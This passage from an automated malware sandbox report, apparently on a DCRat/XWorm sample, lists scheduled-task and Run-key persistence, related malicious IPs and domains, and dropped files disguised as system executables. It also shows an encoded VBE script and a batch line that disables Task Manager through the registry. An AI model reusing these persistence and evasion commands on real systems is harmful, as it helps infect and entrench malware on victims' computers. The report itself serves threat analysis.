                10:52:00Task SchedulerRun new task: hvxmowIikyCfRrhhAMpWFavmEnuKtLh path: "C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe"
                10:52:00Task SchedulerRun new task: Memory Compression path: "C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe"
                10:52:00Task SchedulerRun new task: Memory CompressionM path: "C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe"
                10:52:01Task SchedulerRun new task: WmiPrvSE path: "C:\Program Files\Windows Mail\WmiPrvSE.exe"
                10:52:01Task SchedulerRun new task: WmiPrvSEW path: "C:\Program Files\Windows Mail\WmiPrvSE.exe"
                10:52:14Task SchedulerRun new task: JavaClient path: C:\Users\user\AppData\Local\Temp\JavaClient.exe
                10:52:15AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run JavaClient C:\Users\user\AppData\Local\Temp\JavaClient.exe
                10:52:23AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run JavaClient C:\Users\user\AppData\Local\Temp\JavaClient.exe
                10:52:31AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JavaClient.lnk

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                147.185.221.17FUDE.bin.exeGet hashmaliciousXWormBrowse
                  system47.exeGet hashmaliciousXWormBrowse
                    setup.exeGet hashmaliciousXWormBrowse
                      APPoKkkk8h.exeGet hashmaliciousUnknownBrowse
                        hatabat.exeGet hashmaliciousBlank Grabber, DCRat, XWormBrowse
                          file.exeGet hashmaliciousStealerium, SugarDump, XWormBrowse
                            system.batGet hashmaliciousXWormBrowse
                              cheeto.exeGet hashmaliciousXWormBrowse
                                loader.exeGet hashmaliciousBinder HackTool, XWormBrowse
                                  NECOv1fTXe.exeGet hashmaliciousNeshta, XWormBrowse

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    bg.microsoft.map.fastly.nethttp://uk.shinydictionary.top/bx4ng7rcoxggna6/g1y0p8nnyk2/ghe35kh63f35h6h4/Get hashmaliciousUnknownBrowse
                                    • 199.232.214.172
                                    Packing List.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 199.232.210.172
                                    MSIBCB9.dllGet hashmaliciousUnknownBrowse
                                    • 199.232.214.172
                                    https://erateadvantage.comGet hashmaliciousUnknownBrowse
                                    • 199.232.214.172
                                    RFQ-SW M-0013091-DHABI EQUIPMENT.TARGet hashmaliciousRedLineBrowse
                                    • 199.232.214.172
                                    (No subject) (48).emlGet hashmaliciousUnknownBrowse
                                    • 199.232.214.172
                                    http://singapore-changi-airport.com/transfersGet hashmaliciousUnknownBrowse
                                    • 199.232.214.172
                                    https://royal-glade-286f.kdsj.workers.dev/help/637205020878504Get hashmaliciousUnknownBrowse
                                    • 199.232.210.172
                                    https://nkill-star.github.io/netflix-cloneGet hashmaliciousHTMLPhisherBrowse
                                    • 199.232.214.172
                                    https://navya3396.github.io/netflixhomepage/Get hashmaliciousHTMLPhisherBrowse
                                    • 199.232.210.172

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    SALSGIVERUSkiller.exeGet hashmaliciousXWormBrowse
                                    • 147.185.221.18
                                    setup.exeGet hashmaliciousXWormBrowse
                                    • 147.185.221.21
                                    msedge.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                                    • 147.185.221.20
                                    z5F3uLmKBu.exeGet hashmaliciousXWormBrowse
                                    • 147.185.221.20
                                    PMRpXCwamC.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                    • 147.185.221.21
                                    dH3bcNSEKG.exeGet hashmaliciousXWormBrowse
                                    • 147.185.221.20
                                    Vjy8d2EoqK.exeGet hashmaliciousBlank Grabber, DCRat, XWormBrowse
                                    • 147.185.221.21
                                    FUDE.bin.exeGet hashmaliciousXWormBrowse
                                    • 147.185.221.17
                                    SSPInstallerV2.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                    • 147.185.221.20
                                    Xbox.exeGet hashmaliciousXWorm, XmrigBrowse
                                    • 147.185.221.20

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Componenthost\6d03130ea54d38

                                    Download File
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:ASCII text, with very long lines (591), with no line terminators
                                    Category:dropped
                                    Size (bytes):591
                                    Entropy (8bit):5.855765779588202
                                    Encrypted:false
                                    SSDEEP:12:G0np3E3XV40bh8+KqpPkupGcCIIFCMR3wg/BWm+Bl1nPAIIu/:1u3Xrh8+KqxecCGMRNgJDAz0
                                    MD5:41555E8BE34D68781BF14340B755846A
                                    SHA1:0471F9C9E3ACC899315FF1394395FC44DBCB4D66
                                    SHA-256:C27996E0258AF577DAF22147E867825F2C95A0C10DECB7E9E9219CA6A25BF4BC
                                    SHA-512:ACCD0DFFC8E563AAC3DEDA772AD5EB4C78B8F88BEC9C9B53EDF2817BBEABEC524758F2B094FE4C642612CBE3D1698551E44971023C9FA378D5D6514F7193474C
                                    Malicious:false
                                    Preview:R1By0Uv4JLpN8jqcK8XPHL6k0mD4oyr83SmgHLMEunMURwWYX6mJTIcF4a8NQ0QVeqUp6JV8wSfe8mTDQphrMhouzhlrN9y3X1zkcqbNlnXAn8GSH46kTiJ6Cj0ZinuwelHHwsljOTGiKoH1aTkTCNjyr3i20Bp72kfB18fYTXWAbkvXc89PDbuRCSa3KssMoJqkIFAbyMAo0jWGIKZ2BZ3a0N8iilOkpJWS4LPW8ib1bFbd6Tv9S0KOPPt5Gb2M8Z9qMDM75C3d8C9vwfmP0ORy8HDobUQgpO3BFuQ2GyDQ7rPMP8IlznVtILrF9iflwWxuI8pBOtICKB1R11YcLorC3J24CL2iScdk3fDRSHWGeSiGTaNIJCaHpv08Gv8D0kusiRXWxHJESkhklvkm7uYPCV4IoEKhISP4i0iCD1VC2VyENQXULWFGMeqMWOrs6m6AVnBuMhjGYVWqgz5Yq0VvMIsDJWqyJmGQZytkOnHox8s0IApgTSBGQKxM48k01u7vPGQrGUKDsr7Na15JqJe0l99PBgpQCRwCB6lBt8a9I7YiNjwDCbJrQGKPGBqkp4Ba54MeQ3Zssfs

                                    C:\Componenthost\N1me8mpFe7zJQMouCBhkn06ZkahUl.bat

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):153
                                    Entropy (8bit):5.0227587512891265
                                    Encrypted:false
                                    SSDEEP:3:I5qgQ5VZTVNZFQNBZwXD9so3KRfyM1K7eB/k+7W34hebJNAKyMhF7FKD:Ior5VZTV2TStuH1jhRiI36BY
                                    MD5:399AF29D9E585DFA84153C9E8391A4C2
                                    SHA1:B187F84C3189AFA7A16A47FD48F1CC13B92240C7
                                    SHA-256:34C1022005B752640628AE992883C2171B422A1256A326C97DEFCC57DC871C6D
                                    SHA-512:E7950BCAC463854B2A0F99FA73AA5CC3B828F11CFDA1550EDF1508473DFF031A09FFB5859C6EE39D3B31DFE7A2B99BF723696E22BB599CDAEB758CAE928E59D1
                                    Malicious:false
                                    Preview:"C:\Componenthost\providerreviewdhcp.exe" & reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

                                    C:\Componenthost\aZjsojBpBtPKe.vbe

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):216
                                    Entropy (8bit):5.7731349012435755
                                    Encrypted:false
                                    SSDEEP:6:GVwqK+NkLzWbHnPv7qK+NkLzWHmPruTLzvQqIFk+7s:G4MCzWLnP/MCzWGPruHzYo+7s
                                    MD5:936B4D63770A4CD26E907D7D9D6D4260
                                    SHA1:70FBA586E95FD236CA8239C0C0B0D678F99F71B7
                                    SHA-256:A259F59D9035B30DFA5D82F2F8707D6CAF2632841E4BAF00D4A5B019089DEC8C
                                    SHA-512:3F9ED5DABC43641BF29056C71BBF772A9AF946CE5C55ECB7BD18DD411A8D1CE54993EB56176575F0B9F11FFEF7749C35FDDC96415430271B8708E4A8FF42B5A8
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    Preview:#@~^vwAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v!b@#@&j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.k4?4+sscIEU~rZlz;GswG.+.YtK/D&18:n%swonFy95\W!ZA4VU!+}0l4js (lOJB~!BPWC^/+gT0AAA==^#~@.

                                    C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe

                                    Download File
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1271808
                                    Entropy (8bit):6.974484340050101
                                    Encrypted:false
                                    SSDEEP:24576:whRV3k2rJm5LCipfsLZeXYzVt39upvFHmWeNxQklxwwRwiJ21nnw+:whwsMc3xHulstzQkl2wRvJ21nnw
                                    MD5:8F04E3EE4A119F4B39412E27CED12DE8
                                    SHA1:6E90446932E03216AFD391499D7407687E362FA9
                                    SHA-256:6B994DD60BF5C088925A2E28F6864ACDE54CA8B8CEA576470189D1B469A39FF7
                                    SHA-512:910F27017296DA9051E872D008CFFB5FCFD23CDA69BBA95E60FE94C34A4338B00462FA29C91C04B31E40448FE0B5F48E4C7A5BC2010167B75E086E88B4A40D6C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 88%
                                    • Antivirus: Virustotal, Detection: 68%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6.......L... ...`....@.. ....................................@..................................K..K.................................................................................... ............... ..H............text...4,... ...................... ..`.sdata.../...`...0...2..............@....rsrc................b..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Componenthost\providerreviewdhcp.exe

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1271808
                                    Entropy (8bit):6.974484340050101
                                    Encrypted:false
                                    SSDEEP:24576:whRV3k2rJm5LCipfsLZeXYzVt39upvFHmWeNxQklxwwRwiJ21nnw+:whwsMc3xHulstzQkl2wRvJ21nnw
                                    MD5:8F04E3EE4A119F4B39412E27CED12DE8
                                    SHA1:6E90446932E03216AFD391499D7407687E362FA9
                                    SHA-256:6B994DD60BF5C088925A2E28F6864ACDE54CA8B8CEA576470189D1B469A39FF7
                                    SHA-512:910F27017296DA9051E872D008CFFB5FCFD23CDA69BBA95E60FE94C34A4338B00462FA29C91C04B31E40448FE0B5F48E4C7A5BC2010167B75E086E88B4A40D6C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 88%
                                    • Antivirus: Virustotal, Detection: 68%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6.......L... ...`....@.. ....................................@..................................K..K.................................................................................... ............... ..H............text...4,... ...................... ..`.sdata.../...`...0...2..............@....rsrc................b..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Program Files (x86)\Windows Defender\en-GB\1a5d5b8dcee3d8

                                    Download File
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):130
                                    Entropy (8bit):5.61819401701826
                                    Encrypted:false
                                    SSDEEP:3:XZgs9HsbMUEhQjqJ+RJDp50U1p8MLKLTXj3NFWQZn:JgyIMUErJuJDXt1nLKLHNFxZ
                                    MD5:B1A5F65539BC600043623188E425AA9C
                                    SHA1:207B7C8366B16F1BE8591B16EDC1C2970B0C9259
                                    SHA-256:12FB68F6754A47C0CB4216405191D54FC3DCDD6A58434B730492397F2EC0A813
                                    SHA-512:8053CDAB9A94AC6EA78BEB259468B2E0A6A2F3BA5E2BA6E3035B4DF2612BA485DB92F361D3943D32037119C9A1616B95742AA968C4760081F8488F3718CE19BD
                                    Malicious:false
                                    Preview:Ew5vV5sR0TO57nSXSwIBb9uXhop9O0CqaT0HQs58qa2LeroxtDc0FjpFBhOrPtCARhfoxKHj0KUAHj3z91PLYMl0nuFteOs7Y146MAAi6295Pp8cnYrXd1mE6oADEXFmbW

                                    C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe

                                    Download File
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1271808
                                    Entropy (8bit):6.974484340050101
                                    Encrypted:false
                                    SSDEEP:24576:whRV3k2rJm5LCipfsLZeXYzVt39upvFHmWeNxQklxwwRwiJ21nnw+:whwsMc3xHulstzQkl2wRvJ21nnw
                                    MD5:8F04E3EE4A119F4B39412E27CED12DE8
                                    SHA1:6E90446932E03216AFD391499D7407687E362FA9
                                    SHA-256:6B994DD60BF5C088925A2E28F6864ACDE54CA8B8CEA576470189D1B469A39FF7
                                    SHA-512:910F27017296DA9051E872D008CFFB5FCFD23CDA69BBA95E60FE94C34A4338B00462FA29C91C04B31E40448FE0B5F48E4C7A5BC2010167B75E086E88B4A40D6C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 88%
                                    • Antivirus: Virustotal, Detection: 68%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6.......L... ...`....@.. ....................................@..................................K..K.................................................................................... ............... ..H............text...4,... ...................... ..`.sdata.../...`...0...2..............@....rsrc................b..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Program Files\Windows Mail\24dbde2999530e

                                    Download File
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:ASCII text, with very long lines (771), with no line terminators
                                    Category:dropped
                                    Size (bytes):771
                                    Entropy (8bit):5.900985151127558
                                    Encrypted:false
                                    SSDEEP:12:mMKrhd2SS8+2RZn9XDI55EtCXMtyrEhr3fKdBSx2tqfOy/WfMSrWTrlmE6CG0vX4:m1PNZXDsExwQhudq5WpCTMCtKJ62mV2
                                    MD5:C9E37A0655081F8A6FD5D0B886D932BF
                                    SHA1:006493A321CEF2BDB5D6530B26EFEDC86BEE2B05
                                    SHA-256:0438FCF0C4E2852988E71F128269CDFF928CA37B66114DEDB3FE24F4612BE0D0
                                    SHA-512:0584A6BF0F3BBBFF3A0DC5D5CF97E850A0812F8242D246D8C23D7DF5722B2B229558054CC1559EED6060FDE2DB0A547C3CF79567839B059D52AD20F85AC479D6
                                    Malicious:false
                                    Preview:nFFhUdgPz9h96ejxWd2CtxqvrgwnH1RDCRbRAFG3G9z7G95Nps0Mt5CzYTzyr3I7se6pCRxRW96t7tprlj8YAETHPl2qQSLM12OlDPKX4jzt8S2poHNH5t7nKzabYGAExt1FeDoVZkdaPkI6tNBIEDRI4lbNzt9xiu6PawLlc2sUPgXkqdrLF29tctK2mbgpkq2en3f6BZqMV62YN0gVBysqvMwrmS9BVCtjo36x8vJpMwYf1wpv4Kow7LtaGyUsao0SMTuU4tWQoCe8yRz0nOHKY7lcJgqKbbPh5GShBV0KyYH4rumz8eFMhq3PrRKYCMyNx6Ds8SySX6WAzqvZ31L7VDAPMD0uKcHlj4Hur40qpxykT3ZAfveLB12u5xf5bDH5yva5jAr9BfRiOZ6SnzPZ76krCXy4Y4Omp3whdebeDfKgkTfg1MSmys71Ks2MMxkGQp2VnYzIYuVcwEHs1SDLmmx764WulPSQ4DP5bK2cXJODWeFGlKU3uZeo14ZsBFhIbFisyLQrZkydYtkbyQIb4ZfejlEguJbRlFmR5XSZ3mdKkAPHT73v6GOCjEINHu6PJh1THTgb8thR5V4iV7MxQpVf0jr1OERJpNADJ69AacxNi6GOJk1KhJ9dMVchlpN3bYlrU0ZY7MWx2H74dcroNHmgOg1xebYvO3vKUZ3TKcMVwLlEYhEI8jqTwFdx9l4gxlj8VwjEiYdu4RtC5xZ6XPwpNcYO5GTjhqhKmmsl7AjjG5YfVb1MM8Ihy4v3YVI

                                    C:\Program Files\Windows Mail\WmiPrvSE.exe

                                    Download File
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1271808
                                    Entropy (8bit):6.974484340050101
                                    Encrypted:false
                                    SSDEEP:24576:whRV3k2rJm5LCipfsLZeXYzVt39upvFHmWeNxQklxwwRwiJ21nnw+:whwsMc3xHulstzQkl2wRvJ21nnw
                                    MD5:8F04E3EE4A119F4B39412E27CED12DE8
                                    SHA1:6E90446932E03216AFD391499D7407687E362FA9
                                    SHA-256:6B994DD60BF5C088925A2E28F6864ACDE54CA8B8CEA576470189D1B469A39FF7
                                    SHA-512:910F27017296DA9051E872D008CFFB5FCFD23CDA69BBA95E60FE94C34A4338B00462FA29C91C04B31E40448FE0B5F48E4C7A5BC2010167B75E086E88B4A40D6C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 88%
                                    • Antivirus: Virustotal, Detection: 68%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6.......L... ...`....@.. ....................................@..................................K..K.................................................................................... ............... ..H............text...4,... ...................... ..`.sdata.../...`...0...2..............@....rsrc................b..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Program Files\Windows Security\BrowserCore\en-US\886983d96e3d3e

                                    Download File
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:ASCII text, with very long lines (397), with no line terminators
                                    Category:dropped
                                    Size (bytes):397
                                    Entropy (8bit):5.869150935958587
                                    Encrypted:false
                                    SSDEEP:12:p9qTU8Mjdq2vzhGzdMGvXIcQB4jBqixleri0aG:pgY8L2YdPvXIcQB41mtaG
                                    MD5:0B6D8E06E0056647E26E959066231093
                                    SHA1:4B886B23005D9917CBA9C96C8931FEC5AD75CD04
                                    SHA-256:520238DD32AC860F8181775EABAE5D8DF3192E85F1603C53B310D0D5DF1BED1F
                                    SHA-512:D7C08489258B79CD1F2EF0C4189197845E1FC56C4C887ABED197CF5586A42FF3A0FFFA040DBC6162A6F47096EA71C68808A6EB48342B1CDDC20F092986E14BA3
                                    Malicious:false
                                    Preview:hr0nDlwwt7r9e4s5FMTV2DIqmu5mcr1viRbsYxBQZTaJoX6Gg4wQvCfdjJASpKUCF6aNcAhSKC5in8COxzFi5l9gv7JOxslP8YEs6sngWeFsH60lHvf0FwHe64cf1SfcbqjO4TSFLjLbgQYyGiHBNuKMQjvCQIpD8nRaWlrxdaogkq8pfnYTLdOqgX8UhQyD3Ic298be0ThxGolklGgmuV1fYk49nXPNlkmcOFqhM3c26bk2vXsbtMTiQ7eZEc1dDTLfCJVgZ8Z139i79BOPpyeYREMRlRduC8ymPE0lCLCuxcoQYgZCOlyPzxO77E5Ifpy5K5r5LmNdwtlzZ52E1bgbJjxc02o7P3PHntGcze0lXUdGLZiBL1QEJXvkIPFT7QO2deLqyZPXk

                                    C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe

                                    Download File
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1271808
                                    Entropy (8bit):6.974484340050101
                                    Encrypted:false
                                    SSDEEP:24576:whRV3k2rJm5LCipfsLZeXYzVt39upvFHmWeNxQklxwwRwiJ21nnw+:whwsMc3xHulstzQkl2wRvJ21nnw
                                    MD5:8F04E3EE4A119F4B39412E27CED12DE8
                                    SHA1:6E90446932E03216AFD391499D7407687E362FA9
                                    SHA-256:6B994DD60BF5C088925A2E28F6864ACDE54CA8B8CEA576470189D1B469A39FF7
                                    SHA-512:910F27017296DA9051E872D008CFFB5FCFD23CDA69BBA95E60FE94C34A4338B00462FA29C91C04B31E40448FE0B5F48E4C7A5BC2010167B75E086E88B4A40D6C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 88%
                                    • Antivirus: Virustotal, Detection: 68%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6.......L... ...`....@.. ....................................@..................................K..K.................................................................................... ............... ..H............text...4,... ...................... ..`.sdata.../...`...0...2..............@....rsrc................b..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Recovery\886983d96e3d3e

                                    Download File
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:ASCII text, with very long lines (406), with no line terminators
                                    Category:dropped
                                    Size (bytes):406
                                    Entropy (8bit):5.863202804648079
                                    Encrypted:false
                                    SSDEEP:6:WahQSoN3j5ZydbciIJvHceKUSEtwyxKWQ8G+ISKMkIgq7gDjuFfU5gU:phQj1jXIbrIlRPrtD4+RKMkggaf6
                                    MD5:1ACB1C56C7D4020017B12AF461CA2FD2
                                    SHA1:6B1071C65C4548A92823DC1AE79825D1CABF214D
                                    SHA-256:22F60038268311BBC7120F9832F8A1F46E9FA170FEF4207844C180C321D97BC2
                                    SHA-512:5AB0F39E1C563A2B02C47784D7C5AC948DD86D6B31B01FFFEE98FE9E7400E7DBC7863F2359B94184321C5F3CC7AAD861BF1972FFB0DF641FA41053FED71856CF
                                    Malicious:false
                                    Preview:E6xRdi295HaBPSPbQTDzCuFdpYWLr9pRyMeHUYFCmAFzdHhzLviO3pWT1UlFMrS5bIMDxIG2OANBoQAh1gA6baYJzKPAw9z4sJXV5dBDoqA2cUplTDOprVeAuCOn2GFPLSTf3pmXf6RuafrefoqtuKNWpWl2PXLilvrJBJsob0JuEukOVtINZVeAE60gEtIHvtJpyhcV6CS4AdS5wWhfP8JPRqFFTLkrrC9Uk4ZxQwQWDj9kn5urMn1xk3YHcXBvckM8e7U17uOdrwMrrfcYa3fEKMurgSV3vf4cXAGpk3tbYYFxrra64mUjFHySNmUpZUsM1tTqYwxhJDqvG6Az1Y8IKVXPMxc8iECDq258XtiIyxaBbDLQmfxAWjBgVDekUz8EAmENACbIz0TX5VyImL

                                    C:\Recovery\csrss.exe

                                    Download File
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1271808
                                    Entropy (8bit):6.974484340050101
                                    Encrypted:false
                                    SSDEEP:24576:whRV3k2rJm5LCipfsLZeXYzVt39upvFHmWeNxQklxwwRwiJ21nnw+:whwsMc3xHulstzQkl2wRvJ21nnw
                                    MD5:8F04E3EE4A119F4B39412E27CED12DE8
                                    SHA1:6E90446932E03216AFD391499D7407687E362FA9
                                    SHA-256:6B994DD60BF5C088925A2E28F6864ACDE54CA8B8CEA576470189D1B469A39FF7
                                    SHA-512:910F27017296DA9051E872D008CFFB5FCFD23CDA69BBA95E60FE94C34A4338B00462FA29C91C04B31E40448FE0B5F48E4C7A5BC2010167B75E086E88B4A40D6C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 88%
                                    • Antivirus: Virustotal, Detection: 68%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6.......L... ...`....@.. ....................................@..................................K..K.................................................................................... ............... ..H............text...4,... ...................... ..`.sdata.../...`...0...2..............@....rsrc................b..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\6d03130ea54d38

                                    Download File
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:ASCII text, with very long lines (566), with no line terminators
                                    Category:dropped
                                    Size (bytes):566
                                    Entropy (8bit):5.868992207806771
                                    Encrypted:false
                                    SSDEEP:12:LzjP27pQ17qLyxyEQ1S2WMRhcX2+18dTY1oKOnhlplan:LEJLyxNT2VhcX29cXOva
                                    MD5:2258D92E44BBE3DDC88B66D2BE98F27E
                                    SHA1:1DB62E5D1E686F42F9452D88C664624103F9569C
                                    SHA-256:A0F74A2E8836D9E05F0E63DD074E51F2EBCCEF0A3AE0A096C3C53AF14C05D5C0
                                    SHA-512:9B6E6A480AC1239EB81902B10BE65EC1A788D872DEAD16CC5DAB0DA255C9B6ABB01B87926DF92FA3BC66A2224BA5E4C28AF5503DF6724B4E5A59F9094E38B41E
                                    Malicious:false
                                    Preview:SD23eOHXjhAWs0yMm1HfMsKvwBiHYAw1lVd0fboO7gnqsMrdQkVeirWj2HGcp98jvJuXX7qLN2iqFeDjUF1xoRS3948YVLj7hD4jcUFS4KQqJqdYEgIkIL4e00Yd9S0CTlIBjdHA9i3eAluTajUyD8yWJatl5mSmUOXihbzkZHljRZdOFFCZ7B9Uww2IufEWQRKvNMv8utZ5XOEt7ef0j2oSPDvujq03DOT9PrA3TDpNmD7irILP9NwXn1gKbBZD2f1J4EePdmhgNaqLFMDbfk30b6WXLzcSolVGLynmo6wXpQJMLUFO88iRlBr8sGDnKP1lFj9RjawjygKKxKL1uNUqDDfKGp4i2INaYhGmUxphL9dE1hKh4M265LiCEzK3fOqqTuvPDjh7iweEkaTjeXnqQReN9EhemvC7SxvHv5eUo5XJqecoglYIkAZCPiQ8BCUwuhvwoMyj3SBU3Vgem37BX3WRXs1MpfSmklYJsp9UxzPR8EJ4CvWIETZ0KdZ6Ul3XAZuR6Ww63nOhoETSj7K3IKhRMi8OPD9L51RjU17p9ZObE2MGKH

                                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe

                                    Download File
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1271808
                                    Entropy (8bit):6.974484340050101
                                    Encrypted:false
                                    SSDEEP:24576:whRV3k2rJm5LCipfsLZeXYzVt39upvFHmWeNxQklxwwRwiJ21nnw+:whwsMc3xHulstzQkl2wRvJ21nnw
                                    MD5:8F04E3EE4A119F4B39412E27CED12DE8
                                    SHA1:6E90446932E03216AFD391499D7407687E362FA9
                                    SHA-256:6B994DD60BF5C088925A2E28F6864ACDE54CA8B8CEA576470189D1B469A39FF7
                                    SHA-512:910F27017296DA9051E872D008CFFB5FCFD23CDA69BBA95E60FE94C34A4338B00462FA29C91C04B31E40448FE0B5F48E4C7A5BC2010167B75E086E88B4A40D6C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 88%
                                    • Antivirus: Virustotal, Detection: 68%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6.......L... ...`....@.. ....................................@..................................K..K.................................................................................... ............... ..H............text...4,... ...................... ..`.sdata.../...`...0...2..............@....rsrc................b..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Memory Compression.exe.log

                                    Download File
                                    Process:C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe
                                    File Type:CSV text
                                    Category:dropped
                                    Size (bytes):1281
                                    Entropy (8bit):5.370111951859942
                                    Encrypted:false
                                    SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                    MD5:12C61586CD59AA6F2A21DF30501F71BD
                                    SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                    SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                    SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                    Malicious:false
